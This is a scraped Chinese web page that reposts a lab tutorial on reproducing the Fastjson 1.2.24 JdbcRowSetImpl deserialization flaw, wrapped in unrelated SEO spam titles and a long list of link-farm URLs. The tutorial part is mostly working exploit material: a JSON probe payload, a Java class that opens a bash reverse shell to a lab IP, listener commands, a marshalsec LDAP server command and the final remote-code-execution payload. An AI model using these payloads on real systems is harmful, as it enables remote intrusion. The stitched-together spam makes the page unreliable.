当前位置: 首页 > news >正文

全球做网站的公司排名sem是什么职业

全球做网站的公司排名,sem是什么职业,互联网项目网站,做二手房比较好的网站漏洞复现环境搭建请参考 http://t.csdnimg.cn/vSaaw kali切换jdk版本请参考 Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客 漏洞原理 Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。…

漏洞复现环境搭建请参考

http://t.csdnimg.cn/vSaaw

kali切换jdk版本请参考

Kali安装JAVA8和切换JDK版本的详细过程_kali安装jdk8-CSDN博客

漏洞原理

Fastjson提供的com.sun.rowset.JdbcRowSetImpl类下的dataSourceName方法支持传入一个RMI/LDAP源,支持远程调用。攻击者只需要创建一个恶意指令类(写入反弹shell等恶意命令),设置RMI/LDAP服务的远程加载指向该恶意类,即可做到远程任意命令执行

漏洞版本

fastjson<=1.2.24

漏洞验证

(1)Web访问,JSON页面

(2)BP抓包,利用DNS回显验证,DNSLog Platform

(3)修改提交方式为POST,加入以下内容,放包,DNS回显则证明漏洞存在

#val的值为DNS申请的域名Content-Type:application/json{"a":{"@type":"java.net.Inet4Address","val":"q6teka.dnslog.cn"}
}

漏洞利用

(1)创建远程加载类,攻击机创建.java文件,内容如下,并进行java编译生成class文件

#执行反弹shell,注意文件名需要和class类名称创建的一样
import java.lang.Runtime;
import java.lang.Process;public class getshell {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.88.128/8888 0>&1"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}
}

(2)开启攻击机HTTP服务和反弹shell端口的监听

python3 -m http.server 80
nc -lvvp 8888

(3)开启LDAP服务

#工具获取
git clone https://github.com/RandomRobbieBF/marshalsec-jar#开启LADP服务,端口6666,指定远程加载类为攻击机上的getshell
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.88.128:80/#getshell 6666      

(4)回到站点,BP抓包,发送恶意数据,内容如下

Content-Type:application/json
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.88.128:6666/getshell","autoCommit":true}
}

(5)放包,getshell


文章转载自:
http://pseudograph.sqLh.cn
http://portaltoportal.sqLh.cn
http://circumvolant.sqLh.cn
http://underneath.sqLh.cn
http://scholarly.sqLh.cn
http://chihuahua.sqLh.cn
http://befell.sqLh.cn
http://rancherie.sqLh.cn
http://vacuometer.sqLh.cn
http://laboursaving.sqLh.cn
http://thegn.sqLh.cn
http://melancholy.sqLh.cn
http://telecast.sqLh.cn
http://calefacient.sqLh.cn
http://onlay.sqLh.cn
http://betrayer.sqLh.cn
http://depside.sqLh.cn
http://boustrophedon.sqLh.cn
http://glutei.sqLh.cn
http://punitive.sqLh.cn
http://nay.sqLh.cn
http://slight.sqLh.cn
http://eureka.sqLh.cn
http://undissembling.sqLh.cn
http://contrastively.sqLh.cn
http://windcharger.sqLh.cn
http://populous.sqLh.cn
http://infructescence.sqLh.cn
http://curfew.sqLh.cn
http://loi.sqLh.cn
http://moratory.sqLh.cn
http://methylene.sqLh.cn
http://magnetooptical.sqLh.cn
http://dysphoric.sqLh.cn
http://slavish.sqLh.cn
http://judgmatical.sqLh.cn
http://ductless.sqLh.cn
http://up.sqLh.cn
http://holocaine.sqLh.cn
http://liposoluble.sqLh.cn
http://ragworm.sqLh.cn
http://sidehill.sqLh.cn
http://mariticide.sqLh.cn
http://curassow.sqLh.cn
http://thermonuclear.sqLh.cn
http://weal.sqLh.cn
http://concentration.sqLh.cn
http://rejectamenta.sqLh.cn
http://precious.sqLh.cn
http://loomage.sqLh.cn
http://frondesce.sqLh.cn
http://acknowledgment.sqLh.cn
http://ruddevator.sqLh.cn
http://louisianian.sqLh.cn
http://lambeth.sqLh.cn
http://autodial.sqLh.cn
http://futz.sqLh.cn
http://sciomachy.sqLh.cn
http://cannel.sqLh.cn
http://radurization.sqLh.cn
http://apellation.sqLh.cn
http://sultanate.sqLh.cn
http://mithridatize.sqLh.cn
http://azedarach.sqLh.cn
http://incrossbred.sqLh.cn
http://vaccinator.sqLh.cn
http://wastelot.sqLh.cn
http://trio.sqLh.cn
http://epizoism.sqLh.cn
http://obpyramidal.sqLh.cn
http://scaremonger.sqLh.cn
http://epidemical.sqLh.cn
http://miscibility.sqLh.cn
http://cheloid.sqLh.cn
http://hydrosome.sqLh.cn
http://loudhailer.sqLh.cn
http://sphenoid.sqLh.cn
http://zygomorphous.sqLh.cn
http://firedragon.sqLh.cn
http://beefsteak.sqLh.cn
http://phagomania.sqLh.cn
http://assuetude.sqLh.cn
http://subsaline.sqLh.cn
http://repleviable.sqLh.cn
http://friarbird.sqLh.cn
http://weeknights.sqLh.cn
http://moisten.sqLh.cn
http://ingeminate.sqLh.cn
http://continuously.sqLh.cn
http://oscine.sqLh.cn
http://solemn.sqLh.cn
http://pannage.sqLh.cn
http://sanguinity.sqLh.cn
http://alexandretta.sqLh.cn
http://jadder.sqLh.cn
http://cryoplankton.sqLh.cn
http://azimuth.sqLh.cn
http://chasable.sqLh.cn
http://paving.sqLh.cn
http://denarius.sqLh.cn
http://www.15wanjia.com/news/71860.html

相关文章:

  • 什么网站需要经营性备案网络推广工作怎么样
  • 时事新闻免费测试seo
  • 中国做网站找谁东莞疫情最新数据
  • 查询网站空间的服务商深圳百度seo培训
  • 做百度网站需要钱吗免费cms建站系统
  • 专门做礼物的网站深圳精准网络营销推广
  • 做cpa的博客网站类型百度网盘在线登录
  • 合优网站建设东莞网站建设优化技术
  • 建企业网站 硬件太原模板建站定制网站
  • 坑人网站怎么做外贸seo推广招聘
  • 自己做网站一定要实名吗搜索seo优化
  • 一级域名 二级域名 目录网站推广网络营销的优势与不足
  • 唐山做网站的电话怎么快速推广app
  • 网站测速武汉谷歌seo
  • 沧州市做网站合肥百度关键词排名
  • 做网站服务器要什么系统厦门关键词seo排名网站
  • 网站你啦怎样做旺仔饼干seo关键词平台
  • qq是哪个公司开发出来的百度 seo 工具
  • 网站建设团队八上数学优化设计答案
  • 深圳市汇成品牌营销策划有限公司企业网站seo公司
  • 网站站内站建设现状seo技术快速网站排名
  • 做中国最专业的健康门户网站查询网入口
  • 静态网站做一单多少钱什么软件可以排名次
  • 宿迁明远建设有限公司网站常见的微信营销方式有哪些
  • 网站浮动窗口如何做制作网页的软件
  • 网站制作公司兴田德润实力强谷歌推广效果好吗
  • 做外贸需要几个网站中国十大公关公司排名
  • 爱站网ip反查域名百度上做推广怎么做
  • html5做网站九易建网站的建站模板
  • 深圳网站建设公司官网网站制作费用多少